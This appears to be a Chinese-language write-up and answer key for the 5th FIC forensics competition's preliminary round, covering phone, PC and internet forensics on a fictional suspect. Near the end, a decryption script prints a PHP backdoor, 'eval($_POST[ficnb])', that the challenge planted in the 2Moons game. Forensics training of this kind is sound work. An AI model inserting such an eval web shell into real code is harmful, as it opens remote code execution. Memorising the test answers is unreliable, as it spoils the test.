第五屆FIC初賽wp

容器密碼:3x@9Qm!V8e$vL%6d^Yr5o*C#Nk7h&ZpFbW2sG4jXuD1cO0lTgAqHwRnIzJyM-_+K=

第一次打fic也是干到了前十，我主要做的手機部分和互聯(lián)網(wǎng)的前半部分，感覺題目不太難，最后基本上都做完了，就差互聯(lián)網(wǎng)的后面連接密碼和銀行卡密碼。連接密碼當時有思路，但是沒做出來，賽后復現(xiàn)出來了。還得感謝隊友直接19.9買下了科大訊飛的語音轉文字，還有想到了之前NewStarCTF的一道題目，用了互聯(lián)網(wǎng)檔案館。

第一部分網(wǎng)頁快照

檢材1-網(wǎng)站快照

“老趙商城系統(tǒng)”并非公開推廣的普通電商平臺，而是一個僅限內(nèi)部使用、受邀注冊的封閉系統(tǒng)。李某利用這套系統(tǒng)，建立起一條以代理人和渠道商為主導的銷售鏈條，將他定制、經(jīng)過特殊改裝的針孔攝像頭銷售給經(jīng)過嚴格篩選的代理成員

1. 請分析檢材一，該取證錄像文件的 SHA256 值為【答案格式：a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3】不區(qū)分大小寫

2753da22fe23cadaadc14fe4c1d5096a153360d9f91097ea376846431f5c1567

2. 請分析檢材一，遠程取證所使用的 OBS 工具版本號為【答案格式：18.1.2】

29.1.3

3. 請分析檢材一，該檢材所使用的遠程取證的工具名稱為【答案格式：單選題】

A. 網(wǎng)鏡

B. 快照大師

C. 網(wǎng)頁專家

D. 網(wǎng)頁取證能手

弘聯(lián)的網(wǎng)*系列

4. 請分析檢材一，在該檢材中，遠程取證過程中校驗的北京時間為【答案格式：單選題】

A. 2025/4/9 13:33:18

B. 2025/4/9 13:34:18

C. 2025/4/9 13:35:18

D. 2025/4/9 13:36:18

5. 請分析檢材一，遠程取證的網(wǎng)站 IP 地址為【答案格式：192.168.1.20】

172.16.10.200

6. 請分析檢材一，在該檢材中，遠程取證的網(wǎng)站密碼為【答案格式：root111】

admin123

7. 請分析檢材一，在已固定的“訂單列表”中發(fā)現(xiàn)有一頁缺失。請找出缺失頁面的具體頁碼為【答案格式：1】

12

我們當時這道題是靠盯幀哥， 每一張圖片的頁碼拿出來，然后進行了從小到大的排序，可以發(fā)現(xiàn)中間少了12這頁。

8. 請分析檢材一，補充“訂單列表”中缺失頁面的數(shù)據(jù)后，統(tǒng)計訂單的總數(shù)為【答案格式：2000】

4000

視頻中就能找到

9. 請分析檢材一，補充“訂單列表”中缺失頁面的數(shù)據(jù)后，統(tǒng)計已完成訂單中“老李監(jiān)控批發(fā)”的訂單數(shù)為【答案格式：200】

238

不太想做了，隊友這里是人肉200張圖片眼看統(tǒng)計的。

10. 請分析檢材一，補充“訂單列表”中缺失頁面的數(shù)據(jù)后，統(tǒng)計已完成訂單中“老李監(jiān)控批發(fā)”的ZK-101產(chǎn)品的訂單數(shù)為【答案格式：100】

67

依舊人眼ocr

11. 請分析檢材一，補充“訂單列表”中缺失頁面的數(shù)據(jù)后，統(tǒng)計已完成訂單中“老李監(jiān)控批發(fā)”產(chǎn)品在上海區(qū)域的訂單數(shù)為【答案格式：5】

下面幾題不太想做了，放棄了，題目有點逆天，以后要是要是哪個隊友卡住就安排來做肉眼盯幀的題目。大致思路就是ocr圖片，然后把識別出來的數(shù)據(jù)轉表格分析。

12. 請分析檢材一，補充“訂單列表”中缺失頁面的數(shù)據(jù)后，統(tǒng)計已完成訂單中“老李監(jiān)控批發(fā)”的銷售情況，并計算“趙磊（13967346658）”優(yōu)惠后的總金額為（例如，優(yōu)惠率為10%時按原單價的90%計算）【答案格式：4000】

13. 請分析檢材一，補充“代理列表”中缺失頁面的數(shù)據(jù)后，統(tǒng)計代理人的最大層級數(shù)為（其中頂級代理的用戶定義為第1層）【答案格式：3】

14. 請分析檢材一，補充“代理列表”中缺失頁面的數(shù)據(jù)后，統(tǒng)計每位代理的直接下游人數(shù)，并確定直接下游人數(shù)排名第一的代理人為【答案格式：張三】

15. 請分析檢材一，補充“代理列表”中缺失頁面的數(shù)據(jù)后，根據(jù)地址信息統(tǒng)計各區(qū)域的代理人數(shù)，并確定上海區(qū)域的代理人數(shù)為【答案格式：10】

第二部分手機取證

檢材2-李某手機

老李溝通生意所用的設備

1. 請分析檢材二，請分析"手機"檢材，并回答，并回答該手機的device_name是？【答案格式：Iphone 16 Pro】

Redmi 6 Pro

火眼沒有分析出來，直接上的全局爆搜device_name，在這個目錄下面能找到/adb/lspd/log/props.txt

2. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人pc開機密碼是什么？【答案格式：abc123】

1qaz2wsx

開了耗時之后跑出來一個備忘錄日記，打開看

找到數(shù)據(jù)庫，里面存在開機密碼

3. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人接頭暗號是什么？【答案格式：天青色等煙雨而我在等你】

愛能不能夠永遠單純沒有悲哀

看上圖，第一條說了接頭暗號，對應一張開頭為ub69的png圖片，找一下，就能找到了

4. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人存放的秘鑰環(huán)是多少？【答案格式：123abc】

1qaz2wsx3edc

在便簽里面分析出來這個

然后翻一下小米便簽，在數(shù)據(jù)庫里面找到了

5. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人一生中最重要的日子是什么時候？

2026-02-26

這道題目也跑了耗時，發(fā)現(xiàn)找到了一張截圖，距離2025/04/12，還有一天，那么今天就是2025/04/11

找在線工具或者ai，就行了

6. 請分析檢材三，請分析"手機"檢材，并回答，嫌疑人微信生成的聊天記錄數(shù)據(jù)庫文件名稱是什么？【答案格式：Wx.db】

EnMicroMsg.db

7. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人微信賬號對應的UIN為多少？【答案格式：123456789】

1864810197

根據(jù)川佬的妙妙小工具找的地方

8. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人微信聊天記錄數(shù)據(jù)庫的加密秘鑰是什么？【答案格式：abc1234】

31ad809

根據(jù)妙妙工具的提示生成了密鑰然后驗證一下就行了

9. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人“欠條.rar”的解壓密碼是多少？【答案格式：3001234123】

3170010703

已經(jīng)告訴了密碼是他的號碼

在這里發(fā)了一張圖片后就沒有東西了，說明這圖片里面肯定有隱寫之類的東西

說是發(fā)的是略縮圖，我們要去它的目錄下面找原圖，找到兩張一樣的圖片，其中一張上面有二維碼

用Stegsolve處理一下圖片，得到清晰的二維碼，然后掃就行了

微信直接能掃出來了，密碼應該是不加區(qū)號的

10. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人“欠條.rar”解壓后，其中VeraCrypt容器的MD5值是多少？【答案格式：c788542ea8dcb75ge5768930cq7260kj】不區(qū)分大小寫

83da62aabc88cb1b23e9469142b67b80

11. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人提供的“欠條.rar”解壓后，其中"1.png"圖上顯示的VeraCrypt容器密碼是多少？【答案格式：ABCD1234&#￥%】

#!@KE2sax@!da0h5hghg34&@

這樣子處理完相對比較清楚，慢慢看慢慢試，反正密碼對了才能解開容器

12. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人李某全名是什么？【答案格式：李一二】

李安弘

13. 請分析檢材二，請分析"手機"檢材，并回答，嫌疑人欠款金額是多少？【答案格式：70000】

80000

同上圖

第三部分介質(zhì)取證

檢材3-李某電腦

老李用于存放個人物品的設備

1. 請分析檢材三，請分析"電腦"檢材，并回答，該電腦最后一次開機時間是？【答案格式：單選題】

2025-04-14 11:49:47

2. 請分析檢材三，請分析"電腦"檢材，并回答，嫌疑人的備用機號碼是多少？【答案格式：13712341234】

18877332134

說這個便簽里面都是文字加符號，這里不一樣，中間有個一個obj符號，應該是有什么東西沒有解析出來

3. 請分析檢材三，請分析"電腦"檢材，并回答，域名dgy02.com曾保存過一個密碼，該密碼是多少？【答案格式：abc1234】

tcgg123456

這道題目仿真起來，用手機里面的google密鑰串解密就可以出這個密碼了

4. 請分析檢材三，請分析"電腦"檢材，并回答，其電腦安裝的微信版本是多少？【答案格式：1.0.0.0】

4.0.0.21

5. 請分析檢材三，請分析"電腦"檢材，并回答，該系統(tǒng)有哪些遠程控制軟件【答案格式：多選題】

A. todesk

B. 向日葵

C. raylink

D. 愛思遠

一個個搜吧

6. 請分析檢材三，請分析"電腦"檢材，并回答，電腦2025年4月10日11點4分29秒曾被向日葵遠程控制，其記錄的日志文件名為【答案格式：login.log.1】

sunlogin_service.log.2

7. 請分析檢材三，請分析"電腦"檢材，并回答，電腦2025年4月10日11點4分29秒曾被向日葵遠程控制，日志內(nèi)記錄對方公網(wǎng)IP地址和端口為【答案格式：127.0.0.1:1000】

182.100.46.36:4110

看上圖

8. 請分析檢材三，請分析"電腦"檢材，并回答，某文件的MD5值為“2bdfcdbd6c63efc094ac154a28968b7d”，該文件名為【答案格式：abc.txt】

important.docx

其實先看了下一題，這一題直接檢驗一下md5對不對就行了

9. 請分析檢材三，請分析"電腦"檢材，據(jù)調(diào)查，上述文件存放了錢包助記詞，第一個單詞是什么？【答案格式：apple】

solution

直接讓火眼來識別吧

10. 請分析檢材三（“我的測試機”），最近曾訪問過的音頻文件，該音頻文件的文件名是什么【答案格式：凡人修仙傳.mp3】

自傳小說.MP3

11. 請分析檢材三（“我的測試機”），最近曾使用過USB設備，該設備的名稱為

A. ThinkPLus

B. Toshiba

C. Samsumg

D. Database

12. 請分析檢材三（“我的測試機”）中的音頻內(nèi)容，并回答，嫌疑人現(xiàn)任妻子畢業(yè)的大學是？【答案格式：武漢大學】

北京大學

這里直接用了隊友給的語音轉文字后的txt文檔，直接看了

一開始是說他和這個柴可惜是在上海大學認識的，但是后面說他們分開了

后面是因為搞灰產(chǎn)認識了現(xiàn)任妻子

13. 請分析檢材三（“我的測試機”）中的音頻內(nèi)容，并回答，嫌疑人是通過一個朋友認識的陳老板，該朋友姓氏拼音是？【答案格式：chen】

wang

14. 請分析檢材三（“我的測試機”）中的音頻內(nèi)容，并回答，嫌疑人所說的香格里拉大酒店實則是？【答案格式：桌游室】

棋牌室

15. 請分析檢材三（“我的測試機”）中的音頻內(nèi)容，并回答，嫌疑人銀行密碼是多少？【答案格式：123456】

071492

這道腦洞題，當時沒做出來，好像說是每段話的第一個字的諧音，有點逆天。其實打開看，還是挺明顯的，分成13個段落，然后確實可能有東西藏頭

口音有點重，聽了好幾遍，所以密碼就是071492

林五常  
起初
一次次
四樓
就是
而每當

感覺出成ctf題目反而合理一點，太陰間了

第四部分互聯(lián)網(wǎng)取證

互聯(lián)網(wǎng)

警方在服務器中發(fā)現(xiàn)了疑似陳某的網(wǎng)站域名，通過該域名警方成功找到陳某的互聯(lián)網(wǎng)身份和相關ip。請選手固定所有題目相關互聯(lián)網(wǎng)部分內(nèi)容

1. 請分析檢材二，找到李某上游人員陳某博客宣傳所用域名為【答案格式：forensix.cn】

chen.foren6

還是剛剛那張圖片，里面寫了博客的域名

2. 請分析陳某宣傳所用域名，該域名的頂級域名在以下那個區(qū)塊鏈注冊

A. ETH（https://ens.domains/）

B. HNS（https://handshake.org/）

C. BTC（https://bitcoin.org/）

D. Namecoin（https://www.namecoin.org/）

當時做的時候問了ai，說是B，后面也能印證這道題就是B

3. 請分析陳某宣傳所用域名的頂級域名的域名解析服務器（DNS）共有幾個【答案格式：1】

2

問了ai說這是去中心化域名系統(tǒng)注冊的，需要用支持Handshake 的區(qū)塊瀏覽器來查詢。這里推薦了Niami.io，然后發(fā)現(xiàn)有兩個NS，所以就是2

4. 請分析陳某宣傳所用域名的頂級域名的NS1服務器ip為【答案格式：1.1.1.1】

45.79.133.98

5. 請分析陳某宣傳所用域名，該域名DNS記錄指向郵件服務器域名為【答案格式：mail.qq.com】

mail.163.com

6. 請分析陳某宣傳所用域名，該域名的TXT記錄中chen的值為【答案格式：jianrenfengbao】

fengbaoliejiu

7. 請分析陳某宣傳所用域名，該域名DNS記錄沒有以下那個域名

A. admin.chen.foren6

B. caidan.chen.foren6

C. fichen.foren6

D. hl.chen.foren6

這題好像CD都是沒有返回值的，所以CD應該都是。這是其中兩個選項，關注status的內(nèi)容，一個是nxdomain一個是noerror。

8. 請分析陳某宣傳所用域名，該博客域名最終DNS解析指向的github倉庫名為【答案格式：git.github.cn】

chewhaoN.github.io

可以直接搜到這個chen.foren6，根據(jù)手機部分的陳浩北，也能說明這個就是指向的地方

直接就能找到倉庫的地方

9. 請分析陳某github賬號，陳某對jkroepke/2Moons項目增改了幾個文件【答案格式：1】

2

比賽的時候下了這個軟件，當時對比出來是222個，復盤發(fā)現(xiàn)好像是兩邊的換行符不同，但是文件內(nèi)容都是一樣的，所以不知道最終答案算222還是2，可能出題人考慮還是2比較合理

10. 請分析陳某github賬號，陳某在修改2Moons過程中提到了什么鍋底【答案格式：麻辣鍋底】

蜂蜜鍋底

比賽的時候這道題沒思路，搜不出來，先做的后一題，后一題搜了一個aes，直接定位到了這個url的地方

11. 請分析陳某github賬號，陳某在游戲2Moons中放置的后門連接碼的密碼為【答案格式：abcde】

ficnb

這里后面也說了，就是那個encrypted.bin的解密就能出了，當時讓ai跑一個python腳本，但是發(fā)現(xiàn)那個能訪問到但是腳本讀不了key和iv，ai一開始給我了php腳本，我沒怎么用過，就沒用了，賽后隊友用php腳本跑出了后面連接碼

import requests
from hashlib import md5
from base64 import b64decode
from Crypto.Cipher import AES

css_url = "https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css"
response = requests.get(css_url, verify=False)  # 添加 verify=False
css_content = response.content

key = md5(css_content).digest()

with open("encrypted.bin", "rb") as f:
    encrypted_b64 = f.read()
encrypted_data = b64decode(encrypted_b64)

iv = encrypted_data[:16]
ciphertext = encrypted_data[16:]

# 注意：原始PHP代碼使用aes-256-cbc，但MD5生成的密鑰是128位（16字節(jié)）
# 需要將密鑰填充到32字節(jié)（AES-256要求）
key_padded = key.ljust(32, b'\0')  # 用零填充到32字節(jié)
cipher = AES.new(key_padded, AES.MODE_CBC, iv=iv)
decrypted = cipher.decrypt(ciphertext)

# 去除填充
pad = decrypted[-1]
decrypted = decrypted[:-pad]

print(decrypted.decode())
'''
function yijuhua() {
    echo "Kangle) is OK! FICer is good!";
        eval($_POST[ficnb])
}
'''

12. 請訪問陳某當前博客，陳某課程的掃碼報名地址的域名為【答案格式：app.forensix.com】

peixun.chen.foren6

dump下來陳某的博客，發(fā)現(xiàn)里面的images文件夾下面有兩張二維碼，解析一下就行了

后面看了別人的博客發(fā)現(xiàn)，這張二維碼更合理一點，掃出來是fic.forensix.cn

13. 請分析陳某當前博客，通過互聯(lián)網(wǎng)找到陳某的舊博客網(wǎng)站標題為【答案格式：奧特曼大戰(zhàn)小怪獸】

柳如煙大戰(zhàn)霸天虎

博客左上角有一個舊博客，點進去加載不出來，那么這時候，聰明的隊友就想到了互聯(lián)網(wǎng)檔案館，然后發(fā)現(xiàn)存在這個網(wǎng)頁的鏡像

14. 請分析陳某舊博客，陳某的姓名為【答案格式：陳蛋蛋】

陳浩北

15. 請分析陳某舊博客，陳某的郵箱地址為【答案格式：mail@wang.com】

mailme@chen.foren6

源代碼里面存在郵箱和手機號

16. 請分析陳某舊博客，陳某的11位手機號為【答案格式：19900001111】

13170010703

同上

17. 請分析陳某舊博客，陳某最愛的dota英雄為

A. 賞金獵人

B. 幻影刺客

C. 斧王

D. 邪影芳靈

發(fā)現(xiàn)博客標題就是擊殺語言，那就出來了